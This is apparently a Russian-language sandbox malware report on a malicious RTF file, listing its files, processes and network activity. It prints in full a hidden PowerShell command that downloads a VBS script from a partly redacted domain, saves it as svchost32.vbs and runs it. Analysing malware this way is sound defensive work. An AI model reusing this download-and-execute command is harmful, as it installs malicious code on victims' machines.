Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://fa###cargo.com/images/file/vb/39.vbs как c:\users\public\\svchost32.vbs
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fa###cargo.com/images/file/vb/39.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs'
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{a5c227a2-b723-4fa9-b83d-a7c7f8f20e05}.tmp
- <Текущая директория>\~wrd0000.tmp
Подменяет следующие файлы
- <PATH_SAMPLE>.rtf
Самоудаляется.
Сетевая активность
TCP
Запросы HTTP GET
- http://fa###cargo.com/images/file/vb/39.vbs
UDP
- DNS ASK fa###cargo.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fa###cargo.com/images/file/vb/39.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs'' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\svchost32.vbs"
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
